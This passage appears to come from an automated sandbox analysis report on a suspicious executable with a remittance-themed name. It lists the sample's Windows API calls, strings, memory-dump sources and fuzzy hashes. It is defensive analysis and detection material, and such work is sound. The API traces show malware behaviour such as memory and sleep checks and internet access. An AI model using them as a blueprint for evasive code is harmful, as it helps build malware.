                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: CrackInternet_wcslen
                                                                      • String ID: |
                                                                      • API String ID: 596671847-2343686810
                                                                      • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                      • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                                                                      • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                      • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID: '
                                                                      • API String ID: 3850602802-1997036262
                                                                      • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                      • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                                                      • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                      • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                                                      APIs
                                                                      • _strlen.LIBCMT ref: 0040F858
                                                                        • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                                                        • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                                                      • _sprintf.LIBCMT ref: 0040F9AE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove$_sprintf_strlen
                                                                      • String ID: %02X
                                                                      • API String ID: 1921645428-436463671
                                                                      • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                      • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                                                      • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                      • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID: Combobox
                                                                      • API String ID: 3850602802-2096851135
                                                                      • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                      • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                                                                      • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                      • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                                                                      APIs
                                                                      • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
Similarity
• API ID: LengthMessageSendTextWindow
• String ID: edit
• API String ID: 2978978980-2167791130
APIs
• Sleep.KERNEL32(00000000), ref: 00476CB0
• GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
Strings
Similarity
• API ID: GlobalMemorySleepStatus
• String ID: @
• API String ID: 2783356886-2766056989
APIs
Strings
Similarity
• API ID: htonsinet_addr
• String ID: 255.255.255.255
• API String ID: 3832099526-2422070025
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
Strings
Similarity
• API ID: InternetOpen
• String ID: <local>
• API String ID: 2038078732-4266983199
APIs
Strings
Similarity
• API ID: __fread_nolock_memmove
• String ID: EA06
• API String ID: 1988441806-3962188686
APIs
Strings
Similarity
• API ID: _memmove
• String ID: u,D
• API String ID: 4104443479-3858472334
APIs
• SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• wsprintfW.USER32 ref: 0045612A
Strings
Similarity
• API ID: MessageSend_mallocwsprintf
• String ID: %d/%02d/%02d
• API String ID: 1262938277-328681919
APIs
• InternetCloseHandle.WININET(?), ref: 00442663
• InternetCloseHandle.WININET ref: 00442668
  • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
Strings
Similarity
• API ID: CloseHandleInternet$ObjectSingleWait
• String ID: aeB
• API String ID: 857135153-906807131
APIs
Strings
• C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe, xrefs: 0043324B
• ^B, xrefs: 00433248
Similarity
• API ID: _wcsncpy
• String ID: ^B$C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe
• API String ID: 1735881322-2477654652
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
• PostMessageW.USER32(00000000), ref: 00441C05
  • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
Strings
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
  • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
Strings
                                                                      Similarity
                                                                      • API ID: FindMessagePostSleepWindow
                                                                      • String ID: Shell_TrayWnd
                                                                      • API String ID: 529655941-2988720461
                                                                      • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                      • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                                                                      • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                      • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
APIs
• MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
  • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
Strings
Memory Dump Source
• Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
Similarity
• API ID: Message_doexit
• String ID: AutoIt$Error allocating memory.
• API String ID: 1993061046-4017498283
• Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
• Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
• Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
• Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D